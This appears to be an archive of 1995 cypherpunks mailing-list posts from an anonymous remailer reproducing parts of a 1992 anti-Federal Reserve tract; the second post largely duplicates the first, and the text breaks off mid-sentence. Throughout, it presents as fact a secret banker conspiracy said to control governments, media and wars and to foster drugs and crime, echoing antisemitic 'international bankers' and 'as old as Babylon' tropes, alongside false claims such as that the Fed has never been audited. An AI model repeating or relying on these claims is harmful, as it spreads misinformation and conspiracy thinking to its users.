election. Keep in mind that they endorse all three presidential candi-
dates. Tweedledum and Tweedledee; or Louie, Huey, and Dewey; or Larry, Mo,
and Curly - they are all in the hands of the bankers.

             WHY LOANS EVENTUALLY SHRINK THE CURRENCY SUPPLY

  The only way new currency goes into circulation in America under this
wicked system is when someone borrows it from a banker. When people are
confident of success, they borrow more currency, which increases the
currency supply, and all seem to prosper for a while. Then, as they pay
off their loans, the available currency supply shrinks and currency be-
comes "scarce." Borrowers must always take more currency out of circu-
lation when they repay their loans, than they put in circulation when
they receive their loans. Interest and charges make the repayment total
larger than the loan. This means that only more people borrowing still
more can keep the medium of exchange available to the nation.

   This example may aid understanding. When a citizen goes to a banker
to borrow $100,000 to purchase a home or a farm, and the loan is granted,
the banker gives the borrower a check for $100,000 or credits the borrow-
er's account with $100,000. The borrower, in turn, writes the necessary
checks to the builder, seller, subcontractors, etc. (who, in turn, write
more checks), thereby putting $100,000 of "checkbook currency" into cir-
culation. However, on a 30-year mortgage with 10% interest, the banker
wants $828 per month, or a total of $316,080. The buyer must take that
$316,080 out of circulation, reducing the overall amount in circulation
by $216,080.

   The banker has not really produced anything of value, except the slip
of paper called a check or deposit slip. Yet the banker ends up having
$216,080 more than he had before, minus a few hundred dollars of clerical
and office costs. But the people, as a whole, have $216,080 less.

                 WHY SMALL LOANS HAVE THE SAME EFFECT

   For those who haven't aquite grasped the impact, let us consider an
auto loan for only three years. Step one: citizen borrows $6,000 and pays
it into circulation (to the dealer, factory, etc.). Citizen agrees to re-
pay the banker $7,200. Step two: Citizen pays $200 per month. In 36 months
citizen has taken $7,200 out of circulation and paid it to the bank. Net
result? $1,200 less currency in circulation.

   Since currency requirements increase with expanding population, in-
dustry, and commerce, and paying off any loan decreases the available
currency supply, it is clear that we would quickly run out of currency,
unless more and more people borrow more and more currency to keep curr-
ency in circulation!

   Multiply the above examples by hundreds of millions of times since
1913, and you can see why America has fallen from a prosperous debt-free
nation to the most debt-ridden country in the world. Practically every
home, farm, and business is heavily mortgaged to the bankers. Practically
all our cars, furniture, and clothes are purchased with borrowed currency.
The interest to the bankers on personal, state, and federal debt totals
more than 25% of the combined earnings of the working population!

             THE COST TO THE BANKERS? PRACTICALLY NOTHING

   In the tens of millions of transactions made each year like those
shown here, relatively few bank notes change hands, nor is it necessary







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02220@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper,ink, and a few dollars in salaries and office costs for
each tansaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its ear-
ly stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per cit-
izen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs..
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our childern pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect %2 to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 the traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aide."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions mre in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots kow it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers, edit-
tors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGLEES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. New services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "facists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your grand-
children will own neither car nor home, but will live in "government-
owned" apratments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitious currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Elliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years. After which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
. "I think an alliance with Stalin's Russia is rotten." (January 29,1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American sov-
ereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the obeservation of this quite decided law.... Now the point at which em-
bezzlement of the nation's funds on the part of her officers becomes trea-
son can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson''s perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The Consti-
tution." June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONALAND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which has ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S.,29 U.S.495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:14:18 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280613.HAA02274@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper,ink, and a few dollars in salaries and office costs for
each tansaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its ear-
ly stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per cit-
izen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs..
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our childern pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect %2 to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 the traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aide."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions mre in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots kow it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers, edit-
tors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
